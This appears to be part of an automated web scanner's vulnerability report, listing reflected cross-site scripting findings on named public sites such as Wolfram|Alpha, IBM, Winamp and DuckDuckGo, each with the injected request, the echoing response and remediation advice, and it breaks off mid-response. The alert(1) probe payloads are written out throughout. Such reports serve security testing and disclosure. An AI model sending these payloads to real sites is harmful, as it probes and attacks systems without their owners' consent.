Date: Sun, 27 Feb 2011 01:36:45 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-014c46aed482ac19cb678104562d803c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::en3c623'-alert(1)-'83954da49c1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

3.195. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?41203'-alert(1)-'2f529518186=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-fff3e345c354e49d8e0d897a110c3ceb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?41203'-alert(1)-'2f529518186=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

3.196. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/api/checkreferrer.php

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/api/checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-f7f299238f15fb232758e7723cf59eb8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 14505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef=');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encode
...[SNIP]...

3.197. http://www.winamp.com/media-player/en [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.winamp.com
Path:   /media-player/en

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=US

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 46245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
ryCode = "US";
var playerType = "";
var storeUrlGB = "http://shop.winamp.com/store/winamp/en_GB/buy/productID.103591500/quantity.1/ThemeID.1279300";
var storeBundleUrlGB = "null";
var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft.com/winamp/client/winamp5601_full_emusic-7plus_", winampplayerLite = "http://download.nu
...[SNIP]...

3.198. http://www.wolframalpha.com/input/ [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /input/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /input/?i=labor%20day610cb"-alert(1)-"0920c15034f HTTP/1.1
Host: www.wolframalpha.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:00:30 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: chrome=1
Content-Type: text/html;charset=UTF-8
Set-Cookie: WR_SID=173.193.214.243.1298944830322764; path=/; max-age=315360000; domain=.wolframalpha.com
Set-Cookie: JSESSIONID=828A29FB0D81E34681FD534F67722D3B; Path=/
Content-Length: 24942

<!DOCTYPE html><html class="no-js"><head><title> labor day610cb&quot;-alert&#x28;1&#x29;-&quot;0920c15034f - Wolfram|Alpha</title><meta charset="utf-8" /><meta property="og:title" content="labor day61
...[SNIP]...
<![CDATA[ */

$(function(){


if("") {    
    recalculate("&i=labor%20day610cb"-alert(1)-"0920c15034f");
}

});
/* ]]>
...[SNIP]...

3.199. http://www.wolframalpha.com/input/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /input/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /input/?i=labor%20day&76d96"-alert(1)-"0e67745c3bd=1 HTTP/1.1
Host: www.wolframalpha.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:04:53 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: chrome=1
Content-Type: text/html;charset=UTF-8
Set-Cookie: WR_SID=173.193.214.243.1298945093061519; path=/; max-age=315360000; domain=.wolframalpha.com
Set-Cookie: JSESSIONID=3887B7536B35887892774ECD113FC0BA; Path=/
Content-Length: 36757

<!DOCTYPE html><html class="no-js"><head><title> labor day - Wolfram|Alpha</title><meta charset="utf-8" /><meta property="og:title" content="labor day - Wolfram|Alpha"/><meta name="description" conten
...[SNIP]...
219ecgbi4120fe44f000024250c61hbg69cg5&asynchronous=pod&i=labor+day&s=11&fp=1") {    
    recalculate("recalculate.jsp?id=MSP262219ecgbi4120fe44f000024250c61hbg69cg5&asynchronous=pod&s=11&fp=1&i=labor%20day&76d96"-alert(1)-"0e67745c3bd=1");
}

});
/* ]]>
...[SNIP]...

3.200. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000E-xzo66v00mxYzIlN4750VL:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.201. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:00 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000gO8IZg5GJQycWQPexUluWag:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.202. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:10 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000iq7tvdpDE4j3mL0agZtqeQc:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.203. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:02 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-CXBDaoLY4nHCmAK6zV4PBI:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.204. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:58 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000GCArT-1PDBlbT_LQCkC6TyG:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.205. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:03 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000qQP8LaAzV4rqEyTOAQJuZm5:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.206. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:12 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-1-xrYLgeRYlirNuvDyhMn8:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d">
...[SNIP]...

3.207. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:13 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=00005jmudmVwN90N_S_Y-2phUjm:-1; Path=/
Content-Length: 67330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1">
...[SNIP]...

3.208. http://duckduckgo.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=labor+day HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=2763d'-alert(1)-'c96d2d1c7b1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:59:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 01:59:27 GMT
Cache-Control: max-age=1
Content-Length: 7500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=0;iaq=0;r1hc=0;r1c=0;r2c=0;ric=1;rq='2763d'-alert(1)-'c96d2d1c7b1';rfq=1;rt='';rv='';rad='';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri
...[SNIP]...

3.209. http://duckduckgo.com/Assan_language [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Assan_language

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Assan_language HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=fe031'-alert(1)-'894d4d00e71

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:16 GMT
Cache-Control: max-age=1
Content-Length: 8529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Yeniseian_languages"/><meta http-equiv="conten
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=2;ric=3;rq='fe031'-alert(1)-'894d4d00e71';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.210. http://duckduckgo.com/Cross-site_scripting [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Cross-site_scripting

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cross-site_scripting HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=cc8c8'-alert(1)-'a97d2817fca

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:18 GMT
